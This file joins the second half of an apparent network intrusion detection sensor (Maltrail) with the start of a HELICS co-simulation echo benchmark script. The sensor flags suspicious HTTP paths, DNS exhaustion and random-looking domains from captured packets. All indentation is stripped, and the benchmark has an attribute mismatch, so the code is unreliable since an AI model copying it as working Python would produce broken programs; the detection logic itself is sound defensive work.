log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.URL, trail, trails[check][0], trails[check][1]))
return
if "%s/" % host in trails:
trail = "%s/" % host
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.URL, trail, trails[trail][0], trails[trail][1]))
return
if config.USE_HEURISTICS:
match = re.search(r"\b(CF-Connecting-IP|True-Client-IP|X-Forwarded-For):\s*([0-9.]+)".encode(), packet, re.I)
if match:
src_ip = "%s,%s" % (src_ip, match.group(1))
for char in SUSPICIOUS_HTTP_REQUEST_FORCE_ENCODE_CHARS:
replacement = SUSPICIOUS_HTTP_REQUEST_FORCE_ENCODE_CHARS[char]
path = path.replace(char, replacement)
if post_data:
post_data = post_data.replace(char, replacement)
if not any(_ in unquoted_path.lower() for _ in WHITELIST_HTTP_REQUEST_PATHS):
if any(_ in unquoted_path for _ in SUSPICIOUS_HTTP_REQUEST_PRE_CONDITION):
found = _result_cache.get((CACHE_TYPE.PATH, unquoted_path))
if found is None:
for desc, regex in SUSPICIOUS_HTTP_REQUEST_REGEXES:
if re.search(regex, unquoted_path, re.I | re.DOTALL):
found = desc
break
_result_cache[(CACHE_TYPE.PATH, unquoted_path)] = found or ""
if found and not ("data leakage" in found and is_local(dst_ip)):
trail = "%s(%s)" % (host, path)
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.URL, trail, "%s (suspicious)" % found, "(heuristic)"), packet)
return
if any(_ in unquoted_post_data for _ in SUSPICIOUS_HTTP_REQUEST_PRE_CONDITION):
found = _result_cache.get((CACHE_TYPE.POST_DATA, unquoted_post_data))
if found is None:
for desc, regex in SUSPICIOUS_HTTP_REQUEST_REGEXES:
if re.search(regex, unquoted_post_data, re.I | re.DOTALL):
found = desc
break
_result_cache[(CACHE_TYPE.POST_DATA, unquoted_post_data)] = found or ""
if found:
trail = "%s(%s \\(%s %s\\))" % (host, path, method, post_data.strip())
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.HTTP, trail, "%s (suspicious)" % found, "(heuristic)"), packet)
return
if '.' in path:
_ = _urllib.parse.urlparse("http://%s" % url) # dummy scheme
path = path.lower()
filename = _.path.split('/')[-1]
name, extension = os.path.splitext(filename)
trail = "%s(%s)" % (host, path)
if extension in SUSPICIOUS_DIRECT_DOWNLOAD_EXTENSIONS and not is_local(dst_ip) and not any(_ in path for _ in WHITELIST_DIRECT_DOWNLOAD_KEYWORDS) and '=' not in _.query and len(name) < 10:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.URL, trail, "direct %s download (suspicious)" % extension, "(heuristic)"), packet)
else:
for desc, regex in SUSPICIOUS_HTTP_PATH_REGEXES:
if re.search(regex, filename, re.I):
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.URL, trail, "%s (suspicious)" % desc, "(heuristic)"), packet)
break
elif protocol == socket.IPPROTO_UDP: # UDP
_ = ip_data[iph_length:iph_length + 4]
if len(_) < 4:
return
src_port, dst_port = struct.unpack("!HH", _)
_ = _last_udp
_last_udp = (sec, src_ip, src_port, dst_ip, dst_port)
if _ == _last_udp: # skip bursts
return
if src_port != 53 and dst_port != 53: # not DNS
if dst_ip in trails:
trail = dst_ip
elif src_ip in trails:
trail = src_ip
else:
trail = None
if trail:
_ = _last_logged_udp
_last_logged_udp = _last_udp
if _ != _last_logged_udp:
if not any(_ in trails[trail][0] for _ in ("malware",)):
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.IP, trail, trails[trail][0], trails[trail][1]), packet)
else:
dns_data = ip_data[iph_length + 8:]
# Reference: http://www.ccs.neu.edu/home/amislove/teaching/cs4700/fall09/handouts/project1-primer.pdf
if len(dns_data) > 6:
qdcount = struct.unpack("!H", dns_data[4:6])[0]
if qdcount > 0:
offset = 12
query = ""
while len(dns_data) > offset:
length = ord(dns_data[offset:offset + 1])
if not length:
query = query[:-1]
break
query += get_text(dns_data[offset + 1:offset + length + 1]) + '.'
offset += length + 1
query = query.lower()
if not query or re.search(VALID_DNS_NAME_REGEX, query) is None or any(_ in query for _ in (".intranet.",)) or query.split('.')[-1] in IGNORE_DNS_QUERY_SUFFIXES:
return
parts = query.split('.')
if ord(dns_data[2:3]) & 0xfa == 0x00: # standard query (both recursive and non-recursive)
type_, class_ = struct.unpack("!HH", dns_data[offset + 1:offset + 5])
if len(parts) > 2:
if len(parts) > 3 and len(parts[-2]) <= 3:
domain = '.'.join(parts[-3:])
else:
domain = '.'.join(parts[-2:])
if not _check_domain_whitelisted(domain): # e.g. <hash>.hashserver.cs.trendmicro.com
if (sec - (_subdomains_sec or 0)) > HOURLY_SECS:
_subdomains.clear()
_dns_exhausted_domains.clear()
_subdomains_sec = sec
subdomains = _subdomains.get(domain)
if not subdomains:
subdomains = _subdomains[domain] = _set()
subdomains._start = sec
if not re.search(r"\A\d+\-\d+\-\d+\-\d+\Z", parts[0]):
if sec - subdomains._start > 60:
subdomains._start = sec
subdomains.clear()
elif len(subdomains) < DNS_EXHAUSTION_THRESHOLD:
subdomains.add('.'.join(parts[:-2]))
else:
trail = "(%s).%s" % ('.'.join(parts[:-2]), '.'.join(parts[-2:]))
if re.search(r"bl\b", trail) is None: # generic check for DNSBLs
if not any(_ in subdomains for _ in LOCAL_SUBDOMAIN_LOOKUPS): # generic check for local DNS resolutions
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.DNS, trail, "potential dns exhaustion (suspicious)", "(heuristic)"), packet)
_dns_exhausted_domains.add(domain)
return
# Reference: http://en.wikipedia.org/wiki/List_of_DNS_record_types
if type_ not in (12, 28) and class_ == 1: # Type not in (PTR, AAAA), Class IN
if addr_port(dst_ip, dst_port) in trails:
trail = addr_port(dst_ip, dst_port)
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.IPORT, "%s (%s)" % (dst_ip, query), trails[trail][0], trails[trail][1]), packet)
elif dst_ip in trails:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.IP, "%s (%s)" % (dst_ip, query), trails[dst_ip][0], trails[dst_ip][1]), packet)
elif src_ip in trails:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.IP, src_ip, trails[src_ip][0], trails[src_ip][1]), packet)
_check_domain(query, sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, packet)
elif config.USE_HEURISTICS:
if ord(dns_data[2:3]) & 0x80: # standard response
if ord(dns_data[3:4]) == 0x80: # recursion available, no error
_ = offset + 5
try:
while _ < len(dns_data):
if ord(dns_data[_:_ + 1]) & 0xc0 != 0 and dns_data[_ + 2] == "\00" and dns_data[_ + 3] == "\x01": # Type A
break
else:
_ += 12 + struct.unpack("!H", dns_data[_ + 10: _ + 12])[0]
_ = dns_data[_ + 12:_ + 16]
if _:
answer = socket.inet_ntoa(_)
if answer in trails and not _check_domain_whitelisted(query):
_ = trails[answer]
if "sinkhole" in _[0]:
trail = "(%s).%s" % ('.'.join(parts[:-1]), '.'.join(parts[-1:]))
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.DNS, trail, "sinkholed by %s (malware)" % _[0].split(" ")[1], "(heuristic)"), packet) # (e.g. kitro.pl, devomchart.com, jebena.ananikolic.su, vuvet.cn)
elif "parking" in _[0]:
trail = "(%s).%s" % ('.'.join(parts[:-1]), '.'.join(parts[-1:]))
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.DNS, trail, "parked site (suspicious)", "(heuristic)"), packet)
except IndexError:
pass
elif ord(dns_data[3:4]) == 0x83: # recursion available, no such name
if '.'.join(parts[-2:]) not in _dns_exhausted_domains and not _check_domain_whitelisted(query) and not _check_domain_member(query, trails):
if parts[-1].isdigit():
return
if not (len(parts) > 4 and all(_.isdigit() and int(_) < 256 for _ in parts[:4])): # generic check for DNSBL IP lookups
if not is_local(dst_ip): # prevent FPs caused by local queries
for _ in filter(None, (query, "*.%s" % '.'.join(parts[-2:]) if query.count('.') > 1 else None)):
if _ not in NO_SUCH_NAME_COUNTERS or NO_SUCH_NAME_COUNTERS[_][0] != sec // 3600:
NO_SUCH_NAME_COUNTERS[_] = [sec // 3600, 1, set()]
else:
NO_SUCH_NAME_COUNTERS[_][1] += 1
NO_SUCH_NAME_COUNTERS[_][2].add(query)
if NO_SUCH_NAME_COUNTERS[_][1] > NO_SUCH_NAME_PER_HOUR_THRESHOLD:
if _.startswith("*."):
trail = "%s%s" % ("(%s)" % ','.join(item.replace(_[1:], "") for item in NO_SUCH_NAME_COUNTERS[_][2]), _[1:])
if not any(subdomain in trail for subdomain in LOCAL_SUBDOMAIN_LOOKUPS): # generic check for local DNS resolutions
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.DNS, trail, "excessive no such domain (suspicious)", "(heuristic)"), packet)
for item in NO_SUCH_NAME_COUNTERS[_][2]:
try:
del NO_SUCH_NAME_COUNTERS[item]
except KeyError:
pass
else:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.DNS, _, "excessive no such domain (suspicious)", "(heuristic)"), packet)
try:
del NO_SUCH_NAME_COUNTERS[_]
except KeyError:
pass
break
if len(parts) == 2 and parts[0] and '-' not in parts[0]:
part = parts[0]
trail = "(%s).%s" % (parts[0], parts[1])
result = _result_cache.get(part)
if result is None:
# Reference: https://github.com/exp0se/dga_detector
probabilities = (float(part.count(c)) / len(part) for c in set(_ for _ in part))
entropy = -sum(p * math.log(p) / math.log(2.0) for p in probabilities)
if entropy > SUSPICIOUS_DOMAIN_ENTROPY_THRESHOLD:
result = "entropy threshold no such domain (suspicious)"
if not result:
if sum(_ in CONSONANTS for _ in part) > SUSPICIOUS_DOMAIN_CONSONANT_THRESHOLD:
result = "consonant threshold no such domain (suspicious)"
_result_cache[part] = result or False
if result:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.UDP, TRAIL.DNS, trail, result, "(heuristic)"), packet)
elif protocol in IPPROTO_LUT: # non-TCP/UDP (e.g. ICMP)
if protocol == socket.IPPROTO_ICMP:
if ord(ip_data[iph_length:iph_length + 1]) != 0x08: # Non-echo request
return
elif protocol == socket.IPPROTO_ICMPV6:
if ord(ip_data[iph_length:iph_length + 1]) != 0x80: # Non-echo request
return
if dst_ip in trails:
log_event((sec, usec, src_ip, '-', dst_ip, '-', IPPROTO_LUT[protocol], TRAIL.IP, dst_ip, trails[dst_ip][0], trails[dst_ip][1]), packet)
elif src_ip in trails:
log_event((sec, usec, src_ip, '-', dst_ip, '-', IPPROTO_LUT[protocol], TRAIL.IP, src_ip, trails[src_ip][0], trails[src_ip][1]), packet)
except struct.error:
pass
except Exception:
if config.SHOW_DEBUG:
traceback.print_exc()
def init():
"""
Performs sensor initialization
"""
global _multiprocessing
try:
import multiprocessing
if config.PROCESS_COUNT > 1 and not config.profile:
_multiprocessing = multiprocessing
except (ImportError, OSError, NotImplementedError):
pass
def update_timer():
retries = 0
if not config.offline:
while retries < CHECK_CONNECTION_MAX_RETRIES and not check_connection():
sys.stdout.write("[!] can't update because of lack of Internet connection (waiting..." if not retries else '.')
sys.stdout.flush()
time.sleep(10)
retries += 1
if retries:
print(")")
if config.offline or retries == CHECK_CONNECTION_MAX_RETRIES:
if retries == CHECK_CONNECTION_MAX_RETRIES:
print("[x] going to continue without online update")
_ = update_trails(offline=True)
else:
_ = update_trails()
update_ipcat()
if _:
trails.clear()
trails.update(_)
elif not trails:
_ = load_trails()
trails.update(_)
_regex = ""
for trail in trails:
if "static" in trails[trail][1]:
if re.search(r"[\].][*+]|\[[a-z0-9_.\-]+\]", trail, re.I):
try:
re.compile(trail)
except re.error:
pass
else:
if re.escape(trail) != trail:
index = _regex.count("(?P<g")
if index < 100: # Reference: https://stackoverflow.com/questions/478458/python-regular-expressions-with-more-than-100-groups
_regex += "|(?P<g%s>%s)" % (index, trail)
trails._regex = _regex.strip('|')
thread = threading.Timer(config.UPDATE_PERIOD, update_timer)
thread.daemon = True
thread.start()
create_log_directory()
get_error_log_handle()
msg = "[i] using '%s' for trail storage" % config.TRAILS_FILE
if os.path.isfile(config.TRAILS_FILE):
mtime = time.gmtime(os.path.getmtime(config.TRAILS_FILE))
msg += " (last modification: '%s')" % time.strftime(HTTP_TIME_FORMAT, mtime)
print(msg)
update_timer()
if not config.DISABLE_CHECK_SUDO and check_sudo() is False:
exit("[!] please run '%s' with root privileges" % __file__)
if config.plugins:
config.plugin_functions = []
for plugin in re.split(r"[,;]", config.plugins):
plugin = plugin.strip()
found = False
for _ in (plugin, os.path.join("plugins", plugin), os.path.join("plugins", "%s.py" % plugin)):
if os.path.isfile(_):
plugin = _
found = True
break
if not found:
exit("[!] plugin script '%s' not found" % plugin)
else:
dirname, filename = os.path.split(plugin)
dirname = os.path.abspath(dirname)
if not os.path.exists(os.path.join(dirname, '__init__.py')):
exit("[!] empty file '__init__.py' required inside directory '%s'" % dirname)
if not filename.endswith(".py"):
exit("[!] plugin script '%s' should have an extension '.py'" % filename)
if dirname not in sys.path:
sys.path.insert(0, dirname)
try:
module = __import__(filename[:-3])
except (ImportError, SyntaxError) as msg:
exit("[!] unable to import plugin script '%s' (%s)" % (filename, msg))
found = False
for name, function in inspect.getmembers(module, inspect.isfunction):
if name == "plugin" and not set(inspect.getargspec(function).args) & set(("event_tuple', 'packet")):
found = True
config.plugin_functions.append(function)
function.__name__ = module.__name__
if not found:
exit("[!] missing function 'plugin(event_tuple, packet)' in plugin script '%s'" % filename)
if config.pcap_file:
for _ in config.pcap_file.split(','):
_caps.append(pcapy.open_offline(_))
else:
interfaces = set(_.strip() for _ in config.MONITOR_INTERFACE.split(','))
if (config.MONITOR_INTERFACE or "").lower() == "any":
if IS_WIN or "any" not in pcapy.findalldevs():
print("[x] virtual interface 'any' missing. Replacing it with all interface names")
interfaces = pcapy.findalldevs()
else:
print("[?] in case of any problems with packet capture on virtual interface 'any', please put all monitoring interfaces to promiscuous mode manually (e.g. 'sudo ifconfig eth0 promisc')")
for interface in interfaces:
if interface.lower() != "any" and re.sub(r"(?i)\Anetmap:", "", interface) not in pcapy.findalldevs():
hint = "[?] available interfaces: '%s'" % ",".join(pcapy.findalldevs())
exit("[!] interface '%s' not found\n%s" % (interface, hint))
print("[i] opening interface '%s'" % interface)
try:
_caps.append(pcapy.open_live(interface, SNAP_LEN, True, CAPTURE_TIMEOUT))
except (socket.error, pcapy.PcapError):
if "permitted" in str(sys.exc_info()[1]):
exit("[!] permission problem occurred ('%s')" % sys.exc_info()[1])
elif "No such device" in str(sys.exc_info()[1]):
exit("[!] no such device '%s'" % interface)
else:
raise
if config.LOG_SERVER and ':' not in config.LOG_SERVER:
exit("[!] invalid configuration value for 'LOG_SERVER' ('%s')" % config.LOG_SERVER)
if config.SYSLOG_SERVER and not len(config.SYSLOG_SERVER.split(':')) == 2:
exit("[!] invalid configuration value for 'SYSLOG_SERVER' ('%s')" % config.SYSLOG_SERVER)
if config.LOGSTASH_SERVER and not len(config.LOGSTASH_SERVER.split(':')) == 2:
exit("[!] invalid configuration value for 'LOGSTASH_SERVER' ('%s')" % config.LOGSTASH_SERVER)
if config.REMOTE_SEVERITY_REGEX:
try:
re.compile(config.REMOTE_SEVERITY_REGEX)
except re.error:
exit("[!] invalid configuration value for 'REMOTE_SEVERITY_REGEX' ('%s')" % config.REMOTE_SEVERITY_REGEX)
if config.CAPTURE_FILTER:
print("[i] setting capture filter '%s'" % config.CAPTURE_FILTER)
for _cap in _caps:
try:
_cap.setfilter(config.CAPTURE_FILTER)
except:
pass
if _multiprocessing:
_init_multiprocessing()
if not IS_WIN and not config.DISABLE_CPU_AFFINITY:
try:
try:
mod = int(subprocess.check_output("grep -c ^processor /proc/cpuinfo", stderr=subprocess.STDOUT, shell=True).strip())
used = subprocess.check_output("for pid in $(ps aux | grep python | grep sensor.py | grep -E -o 'root[ ]*[0-9]*' | tr -d '[:alpha:] '); do schedtool $pid; done | grep -E -o 'AFFINITY .*' | cut -d ' ' -f 2 | grep -v 0xf", stderr=subprocess.STDOUT, shell=True).strip().split('\n')
max_used = max(int(_, 16) for _ in used)
affinity = max(1, (max_used << 1) % 2 ** mod)
except:
affinity = 1
p = subprocess.Popen("schedtool -n -2 -M 2 -p 10 -a 0x%02x %d" % (affinity, os.getpid()), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
_, stderr = p.communicate()
if "not found" in stderr:
msg, _ = "[?] please install 'schedtool' for better CPU scheduling", platform.linux_distribution()[0].lower()
for distro, install in {("fedora", "centos"): "sudo yum install schedtool", ("debian", "ubuntu"): "sudo apt-get install schedtool"}.items():
if _ in distro:
msg += " (e.g. '%s')" % install
break
print(msg)
except:
pass
def _init_multiprocessing():
"""
Inits worker processes used in multiprocessing mode
"""
global _buffer
global _multiprocessing
global _n
if _multiprocessing:
print("[i] preparing capture buffer...")
try:
_buffer = mmap.mmap(-1, config.CAPTURE_BUFFER) # http://www.alexonlinux.com/direct-io-in-python
_ = b"\x00" * MMAP_ZFILL_CHUNK_LENGTH
for i in xrange(config.CAPTURE_BUFFER // MMAP_ZFILL_CHUNK_LENGTH):
_buffer.write(_)
_buffer.seek(0)
except KeyboardInterrupt:
raise
except:
exit("[!] unable to allocate network capture buffer. Please adjust value of 'CAPTURE_BUFFER'")
_n = _multiprocessing.Value('L', lock=False)
try:
for i in xrange(config.PROCESS_COUNT - 1):
process = _multiprocessing.Process(target=worker, name=str(i), args=(_buffer, _n, i, config.PROCESS_COUNT - 1, _process_packet))
process.daemon = True
process.start()
except TypeError: # Note: https://github.com/stamparm/maltrail/issues/11823
_buffer = None
_multiprocessing = None
else:
print("[i] created %d more processes (out of total %d)" % (config.PROCESS_COUNT - 1, config.PROCESS_COUNT))
def monitor():
"""
Sniffs/monitors given capturing interface
"""
print("[^] running...")
def packet_handler(datalink, header, packet):
global _count
ip_offset = None
try:
dlt_offset = DLT_OFFSETS[datalink]
except KeyError:
log_error("Received unexpected datalink (%d)" % datalink, single=True)
return
try:
if datalink == pcapy.DLT_RAW:
ip_offset = dlt_offset
elif datalink == pcapy.DLT_PPP:
if packet[2:4] in (b"\x00\x21", b"\x00\x57"): # (IPv4, IPv6)
ip_offset = dlt_offset
elif datalink == pcapy.DLT_NULL:
if packet[0:4] in (b"\x02\x00\x00\x00", b"\x23\x00\x00\x00"): # (IPv4, IPv6)
ip_offset = dlt_offset
elif dlt_offset >= 2:
if packet[dlt_offset - 2:dlt_offset] == b"\x81\x00": # VLAN
dlt_offset += 4
if packet[dlt_offset - 2:dlt_offset] in (b"\x08\x00", b"\x86\xdd"): # (IPv4, IPv6)
ip_offset = dlt_offset
except IndexError:
pass
if ip_offset is None:
return
try:
if six.PY3: # https://github.com/helpsystems/pcapy/issues/37#issuecomment-530795813
sec, usec = [int(_) for _ in ("%.6f" % time.time()).split('.')]
else:
sec, usec = header.getts()
if _multiprocessing:
block = struct.pack("=III", sec, usec, ip_offset) + packet
if _locks.count:
_locks.count.acquire()
write_block(_buffer, _count, block)
_n.value = _count = _count + 1
if _locks.count:
_locks.count.release()
else:
_process_packet(packet, sec, usec, ip_offset)
except socket.timeout:
pass
try:
def _(_cap):
global _done_count
datalink = _cap.datalink()
#
# NOTE: currently an issue with pcapy-png and loop()
#
# if six.PY3 and not config.pcap_file: # https://github.com/helpsystems/pcapy/issues/37#issuecomment-530795813
# def _loop_handler(header, packet):
# packet_handler(datalink, header, packet)
#
# _cap.loop(-1, _loop_handler)
# else:
while True:
success = False
try:
(header, packet) = _cap.next()
if header is not None:
success = True
packet_handler(datalink, header, packet)
elif config.pcap_file:
with _done_lock:
_done_count += 1
break
except (pcapy.PcapError, socket.timeout):
pass
if not success:
time.sleep(REGULAR_SENSOR_SLEEP_TIME)
if config.profile and len(_caps) == 1:
print("[=] will store profiling results to '%s'..." % config.profile)
_(_caps[0])
else:
if len(_caps) > 1:
if _multiprocessing:
_locks.count = threading.Lock()
_locks.connect_sec = threading.Lock()
for _cap in _caps:
threading.Thread(target=_, args=(_cap,)).start()
while _caps and not _done_count == (config.pcap_file or "").count(',') + 1:
time.sleep(1)
if not config.pcap_file:
print("[i] all capturing interfaces closed")
except SystemError as ex:
if "error return without" in str(ex):
print("\r[x] stopping (Ctrl-C pressed)")
else:
raise
except KeyboardInterrupt:
print("\r[x] stopping (Ctrl-C pressed)")
finally:
print("\r[i] cleaning up...")
if _multiprocessing:
try:
for _ in xrange(config.PROCESS_COUNT - 1):
write_block(_buffer, _n.value, b"", BLOCK_MARKER.END)
_n.value = _n.value + 1
while _multiprocessing.active_children():
time.sleep(REGULAR_SENSOR_SLEEP_TIME)
except KeyboardInterrupt:
pass
if config.pcap_file:
flush_condensed_events(True)
def main():
for i in xrange(1, len(sys.argv)):
if sys.argv[i] == "-q":
sys.stdout = open(os.devnull, 'w')
if sys.argv[i] == "-i":
for j in xrange(i + 2, len(sys.argv)):
value = sys.argv[j]
if os.path.isfile(value):
sys.argv[i + 1] += ",%s" % value
sys.argv[j] = ''
else:
break
print("%s (sensor) #v%s {%s}\n" % (NAME, VERSION, HOMEPAGE))
if "--version" in sys.argv:
raise SystemExit
parser = optparse.OptionParser(version=VERSION)
parser.add_option("-c", dest="config_file", default=CONFIG_FILE, help="configuration file (default: '%s')" % os.path.split(CONFIG_FILE)[-1])
parser.add_option("-r", dest="pcap_file", help="pcap file for offline analysis")
parser.add_option("-p", dest="plugins", help="plugin(s) to be used per event")
parser.add_option("-q", "--quiet", dest="quiet", action="store_true", help="turn off regular output")
parser.add_option("--console", dest="console", action="store_true", help="print events to console")
parser.add_option("--offline", dest="offline", action="store_true", help="disable (online) trail updates")
parser.add_option("--debug", dest="debug", action="store_true", help=optparse.SUPPRESS_HELP)
parser.add_option("--profile", dest="profile", help=optparse.SUPPRESS_HELP)
patch_parser(parser)
options, _ = parser.parse_args()
print("[*] starting @ %s\n" % time.strftime("%X /%Y-%m-%d/"))
read_config(options.config_file)
for option in dir(options):
if isinstance(getattr(options, option), (six.string_types, bool)) and not option.startswith('_'):
config[option] = getattr(options, option)
if options.debug:
config.console = True
config.PROCESS_COUNT = 1
config.SHOW_DEBUG = True
if options.pcap_file:
if options.pcap_file == '-':
print("[i] using STDIN")
else:
for _ in options.pcap_file.split(','):
if not os.path.isfile(_):
exit("[!] missing pcap file '%s'" % _)
print("[i] using pcap file(s) '%s'" % options.pcap_file)
if not config.DISABLE_CHECK_SUDO and not check_sudo():
exit("[!] please run '%s' with root privileges" % __file__)
try:
init()
if config.profile:
open(config.profile, "w+b").write("")
cProfile.run("monitor()", config.profile)
else:
monitor()
except KeyboardInterrupt:
print("\r[x] stopping (Ctrl-C pressed)")
if __name__ == "__main__":
code = 0
try:
main()
except SystemExit as ex:
if isinstance(get_ex_message(ex), six.string_types) and get_ex_message(ex).strip('0'):
print(get_ex_message(ex))
code = 1
except IOError:
log_error("\n\n[!] session abruptly terminated\n[?] (hint: \"https://stackoverflow.com/a/20997655\")")
code = 1
except Exception:
msg = "\r[!] unhandled exception occurred ('%s')" % sys.exc_info()[1]
msg += "\n[x] please report the following details at 'https://github.com/stamparm/maltrail/issues':\n---\n'%s'\n---" % traceback.format_exc()
log_error("\n\n%s" % msg.replace("\r", ""))
print(msg)
code = 1
finally:
if not any(_ in sys.argv for _ in ("--version", "-h", "--help")):
print("\n[*] ending @ %s" % time.strftime("%X /%Y-%m-%d/"))
os._exit(code)
|
echoBenchmarks_py.py
|
# -*- coding: utf-8 -*-
"""
Created on Mon May 11 09:59:05 2020
Performs echoBenchmark of the current HELICS Version. It provides some
performacne results of HELICS for a single core and multiple cores for a
variety of core types.
The command line arguments for the function can be found in the code
following the lines following the "if __name__ == '__main__':" line
at the end of this file.
@author: barn553
"""
import helics as h
import sys
import sysconfig
import os
import argparse
import pprint
import string
import random
import logging
from threading import Thread, Barrier, Timer
import json
import cpuinfo
import multiprocessing
import platform
import datetime
import time
import timeit
import psutil
# Setting up logger
logger = logging.getLogger(__name__)
# Setting up pretty printer
pp = pprint.PrettyPrinter(indent=4)
class EchoHub_c:
def __init__(self):
self.finalTime = 0.1
self.vFed = None
self.pubs = []
self.subs = []
self.cnt_ = 10
self.initialized = False
self.readyToRun = False
logging.info("created the echo hub")
def call_on_ready(self, parties):
"""This function creates the barrier for running the tests with
multiple threads.
Args:
parties (int) - The number of barriers to create. In this
case, it is the number of federates plus 1.
Returns:
brr (barrier object) - The barrier for the test.
"""
brr = Barrier(parties)
logging.info("echo hub - created the barrier object")
return brr
def create_value_federate(self, coreName):
"""This function creates a value federate.
Args:
coreName (str) - The name of the core for creating the
value federate.
Returns:
vFed (helics federate object) - The value federate.
"""
name = "echohub Test--T"
fi = h.helicsCreateFederateInfo()
h.helicsFederateInfoSetCoreName(fi, coreName)
global vFed
vFed = h.helicsCreateValueFederate(name, fi)
logging.info("echo hub - created the value federate")
return vFed
def initialize(self, vFed, cnt):
"""This function prepares the data for running the test.
Args:
vFed (helics federate object) - The value federate.
cnt (int) - An initial number. In this case, it is
the number of federates.
Returns:
(null)
"""
logging.info("echo hub - preparing the data for the run")
self.vFed = vFed
self.cnt_ = cnt
i = 0
while i < self.cnt_:
leafname = "leafrx_{}".format(i)
self.pubs.append(
h.helicsFederateRegisterGlobalPublication(
self.vFed, leafname, h.helics_data_type_string, ""
)
)
leafname2 = "leafsend_{}".format(i)
self.subs.append(h.helicsFederateRegisterSubscription(self.vFed, leafname2, ""))
i += 1
self.initialized = True
logging.info("echo hub - the data is prepared for the run")
def make_ready(self, vFed):
"""This function assert that the test is ready to execute.
Args:
vFed (helics federate object) - The value federate
Returns:
(null)
"""
logging.info("echo hub - making sure the test is ready to run")
self.vFed = vFed
if self.initialized is not True:
logging.debug("the test has not been initialized for echo hub")
raise Exception("Must initialize first")
sys.stdout.flush()
h.helicsFederateEnterExecutingModeAsync(self.vFed)
while h.helicsFederateIsAsyncOperationCompleted(self.vFed) == 0:
pass
sys.stdout.flush()
h.helicsFederateEnterExecutingModeComplete(self.vFed)
sys.stdout.flush()
self.readyToRun = True
logging.info("echo hub - the test is ready to run")
def _main_loop(self, vFed):
"""The main loop for running the HELICS functions.
Args:
vFed (helics federate object) - The value federate.
Returns:
(null)
"""
self.vFed = vFed
buffer = chr(256)
cTime = h.helics_time_zero
logging.info("echo hub - starting the helics functions")
while cTime <= self.finalTime:
i = 0
for c in range(0, self.cnt_):
if h.helicsInputIsUpdated(self.subs[i]):
actLen = 0
h.helicsInputGetString(self.subs[i], buffer, 256, actLen)
h.helicsPublicationPublishRaw(self.pub[i], buffer, actLen)
h.helicsFederateRequestTimeAsync(self.vFed, self.finalTime + 0.05)
while h.helicsFederateIsAsyncOperationCompleted(self.vFed) == 0:
pass
cTime = h.helicsFederateRequestTimeComplete(self.vFed)
h.helicsFederateFinalizeAsync(self.vFed)
while h.helicsFederateIsAsyncOperationCompleted(self.vFed) == 0:
pass
h.helicsFederateFinalizeComplete(self.vFed)
logging.info("echo hub - the helics functions have been completed")
def run(self, parties, vFed):
"""This function executes all the above functions. This function
is what we are benchmarking to evaluate its performance.
Args:
parties (int) - The number of barriers to create for the threads.
In this case, it is the number of federates plus 1.
vFed (helics federate object) - The value federate.
Returns:
(null)
"""
logging.info("echo hub - starting the execution of the helics functions")
self.vFed = vFed
self.parties = parties
if not self.readyToRun:
self.make_ready(self.vFed)
sys.stdout.flush()
self.call_on_ready(self.parties)
sys.stdout.flush()
self._main_loop(self.vFed)
logging.info("echo hub - finished the execution of the helics functions")
def __del__(self):
h.helicsFederateFree(self.vFed)
logging.info("echo hub - the test is done -> information is cleared")
class EchoLeaf_c:
def __init__(self):
self.vFed = None
self.pub = None
self.sub = None
self.index_ = 0
self.initialized = False
self.readyToRun = False
logging.info("created the echo leaf")
def call_on_ready(self, parties):
"""This function creates the barrier for running the tests with
multiple threads.
Args:
parties (int) - The number of barriers to create. In this
case, it is the number of federates plus 1.
Returns:
brr (barrier object) - The barrier for the test.
"""
brr = Barrier(parties)
logging.info("echo leaf - created the barrier object")
return brr
def create_value_federate(self, coreName, index):
"""This function creates a value federate.
Args:
coreName (str) - The name of the core for creating the
value federate.
index (int) - The number that indicates which value federate
is created and used during the test.
Returns:
vFed (helics federate object) - The value federate.
"""
name = "echoleaf_{} Test--T".format(index)
fi = h.helicsCreateFederateInfo()
h.helicsFederateInfoSetCoreName(fi, coreName)
global vFed
vFed = h.helicsCreateValueFederate(name, fi)
logging.info("echo leaf - created the value federate")
return vFed
def initialize(self, vFed, index):
"""This function prepares the data for running the test.
Args:
vFed (helics federate object) - The value federate.
index (int) - An identifying number for the name of the leaf.
Returns:
(null)
"""
logging.info("echo leaf - preparing the data for the run")
self.vFed = vFed
self.index_ = index
leafname = "leafsend_{}".format(index)
self.pub = h.helicsFederateRegisterGlobalPublication(
self.vFed, leafname, h.helics_data_type_string, ""
)
leafname2 = "leafrx_{}".format(index)
self.sub = h.helicsFederateRegisterSubscription(self.vFed, leafname2, "")
self.initialized = True
logging.info("echo leaf - the data is prepared for the run")
def make_ready(self, vFed):
"""This function assert that the test is ready to execute.
Args:
vFed (helics federate object) - The value federate
Returns:
(null)
"""
self.vFed = vFed
logging.info("echo leaf - making sure the test is ready to run")
if self.initialized is False:
raise Exception("must initizialize first")
sys.stdout.flush()
h.helicsFederateEnterExecutingModeAsync(self.vFed)
while h.helicsFederateIsAsyncOperationCompleted(self.vFed) == 0:
pass
sys.stdout.flush()
h.helicsFederateEnterExecutingModeComplete(self.vFed)
